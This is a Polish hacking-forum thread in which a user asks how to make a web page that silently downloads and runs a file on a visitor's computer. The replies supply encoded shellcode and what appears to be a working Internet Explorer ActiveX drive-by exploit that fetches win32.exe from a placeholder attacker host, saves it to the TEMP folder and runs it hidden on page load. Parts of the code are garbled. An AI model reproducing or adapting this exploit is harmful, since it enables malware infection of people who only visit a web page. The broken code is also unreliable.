Exploit pod IE 7

trok

Użytkownik
Dołączył
Listopad 4, 2006
Posty
144
W jaki sposób mogę zrobić exploita, takiego że jak ktoś wejdzie na stronę www to jakiś plik mu się ściąga i uruchamia.
Interesują mnie źródła, oraz poradniki - najlepiej po Polsku.
Z góry dzięki!

PS. http://www.securiteam.com/exploits/6B0020KBPM.html - do czego służy ten kod:
Kod:
unescape("%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea

%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b

%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040

%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768%u3273

%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50

%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff

%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be

%uff42%uffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347

%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u3153

%ufec0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350

%u5353%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048

%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c

%u89eb");
 

abramakabra

Były Moderator
Dołączył
Marzec 16, 2003
Posty
1191
Najpierw to musisz znaleźć buga w oprogramowaniu, jak już to zrobisz to napisanie exploita nie będzie dla ciebie problemem ...
smile.gif
 

trok

Użytkownik
Dołączył
Listopad 4, 2006
Posty
144
No dobra, ale pisaliście w innych tematach, że są już takie a ja nie moge znaleźć. =]
 

trok

Użytkownik
Dołączył
Listopad 4, 2006
Posty
144
Dzięki,
w każdym razie jak ktoś wie gdzie moge znaleźć takiego exploita (może być też pod IE 6) to niech pisze.

[ Dodano: 09-07-2007, 19:07 ]
Udało mi się znaleźć interesującego mnie exploita
LINK: http://blogs.law.harvard.edu/zeroday/2006/...poit-technique/
Teraz gdyby ktoś mógł wytłumaczyć mi kilka rzeczy:
1. Plik win32.exe to plik, który będzie się uruchamiał, gdy ktoś odpali exploita przez IE tak?
2. Nie rozumiem linijki "var bin = e.Item("TEMP")+ "" + "metasploit.exe";"
Gdzie ma się znajdować plik metasploit.exe i za co ma odpowiadać?
 

-=silkroad=-

Użytkownik
Dołączył
Lipiec 9, 2007
Posty
125
function Go(a) {
Log('Creating helper objects...');
var s = CreateO(a, "WScript.Shell");
var o = CreateO(a, "ADODB.Stream");
var e = s.Environment("Process");

Log('Ceating the XMLHTTP object...');
var url = "http://EVIL_SITE/adv/168/win32.exe"; var xml = null;
var bin = e.Item("TEMP")+ "" + "metasploit.exe";
var dat;

try { xml=new XMLHttpRequest(); }
catch(e) {
try { xml = new ActiveXObject("Microsoft.XMLHTTP"); }
catch(e) {
xml = new ActiveXObject("MSXML2.ServerXMLHTTP");
}
}

if (! xml) return(0);

Log('');
xml.open("http://EVIL_SITE/adv/GET", url, false)
xml.send(null);
dat = xml.responseBody;

Log('');
o.Type = 1;
o.Mode = 3;
o_Open();
o.Write(dat);
o.SaveToFile(bin, 2);

Log('.');
s.Run(bin,0);
}

function Exploit() {
var i = 0;
var t = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E36}',
'{BD96C556-65A3-11D0-983A-00C04FC29E36}',
'{AB9BCEDD-EC7E-47E1-9322-D4A210617116}',
'{0006F033-0000-0000-C000-000000000046}',
'{0006F03A-0000-0000-C000-000000000046}',
'{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}',
'{6414512B-B978-451D-A0D8-FCFDF33E833C}',
'{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}',
'{06723E09-F4C2-43c8-8358-09FCD1DB0766}',
'{639F725F-1B2D-4831-A9FD-874847682010}',
'{BA018599-1DB3-44f9-83B4-461454C84BF8}',
'{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}',
'{E8CCCDDF-CA28-496b-B050-6C07C962476B}',null);

while (t) {
var a = null;

if (t.substring(0,1) == '{') {
a = document.createElement("object");
a.setAttribute("classid", "clsid:" + t.substring(1, t.length - 1));
} else {
try { a = new ActiveXObject(t); } catch(e){}
}

if (a) {
try {
var b = CreateO(a, "WScript.Shell");
if (
<
{
Log('Loaded ' + t);
Go(a);
return(0);
}
} catch(e){}
}
i++;
}
Log('');
}
</script>
</head>
<body onload='Exploit()'>


</p>
</body>

</html>
<html>
<body>
<script>
document.write(unescape("[LARGE BLOCK OF HEX ENCODED DATA]"))
</script>[/b]



co z tym zrobi ??
 
Do góry Bottom